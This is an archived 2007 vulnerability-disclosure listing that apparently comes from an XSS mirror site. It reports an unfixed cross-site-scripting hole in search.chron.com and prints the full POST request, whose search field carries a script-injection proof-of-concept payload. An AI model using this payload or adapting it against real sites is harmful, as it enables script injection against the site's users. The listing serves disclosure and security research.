Security researcher Skunkfoot, has submitted on 04/11/2007 a cross-site-scripting (XSS) vulnerability affecting search.chron.com, which at the time of submission ranked 3836 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/11/2007 |
Date published: 05/11/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Skunkfoot |
Domain: search.chron.com |
Category: XSS |
Pagerank: 3836 |
URL: http://search.chron.com/chronicle/search.do;jsessionid=7D0480126DB64E0709452F5C9EDE518C |
POST: basicSearchFormComponent.resultsPerPage=10&basicSearchFormComponent.pageNum=1&basicSearchFormCompone nt.maxResults=1000&basicSearchFormComponent.mode=search&basicSearchFormComponent.booleanMode=false&b asicSearchFormComponent.propertyGroup=CHRONICLE&basicSearchFormComponent.configName=basic&basicSearc hFormComponent.siteName=Chronicle&basicSearchFormComponent.suggestedFromDoc=&basicSearchFormComponen t.suggestedTitle=&basicSearchFormComponent.contextMode=false&basicSearchFormComponent.shadowSearchTe xt=&basicSearchFormComponent.shadowDatabaseList=&basicSearchFormComponent.fieldText=&resultNavigatio nFormComponent.propertyGroup=CHRONICLE&resultNavigationFormComponent.configName=taxonomy&resultNavig ationFormComponent.selectedPath=&resultNavigationFormComponent.currentNavigationTree=&resultNavigati onFormComponent.limitResults=0&iqlRulesFormComponent.configName=iql&iqlRulesFormComponent.processMan ualRules=true&iqlRulesFormComponent.processSponsoredRules=true&iqlRulesFormComponent.processConcepts =true&advancedSearchFormComponent.searchAllWordsText=&advancedSearchFormComponent.searchExactPhraseT ext=&advancedSearchFormComponent.searchAtleastOneText=&advancedSearchFormComponent.searchWithoutText =&advancedSearchFormComponent.selectedTermLocation=&advancedSearchFormComponent.selectedLanguage=&ad vancedSearchFormComponent.selectedInterval=&archiveSearchFormComponent.searchAnywhere=&archiveSearch FormComponent.searchHeadline=&archiveSearchFormComponent.searchAuthor=&archiveSearchFormComponent.se lectedSection=&archiveSearchFormComponent.selectedInterval=7&archiveSearchFormComponent.selectedFrom Month=&archiveSearchFormComponent.selectedFromDay=&archiveSearchFormComponent.selectedFromYear=2007& archiveSearchFormComponent.selectedToMonth=&archiveSearchFormComponent.selectedToDay=&archiveSearchF ormComponent.selectedToYear=2007&selectedSort=Date&basicSearchFormComponent.searchText=%27%22%3E%3Cs cript%3Ealert%281%29%3C%2Fscript%3E&basicSearchFormComponent.selectedDatabaseNames=Everything&search =Go |
Click here to view the mirror
|
|
|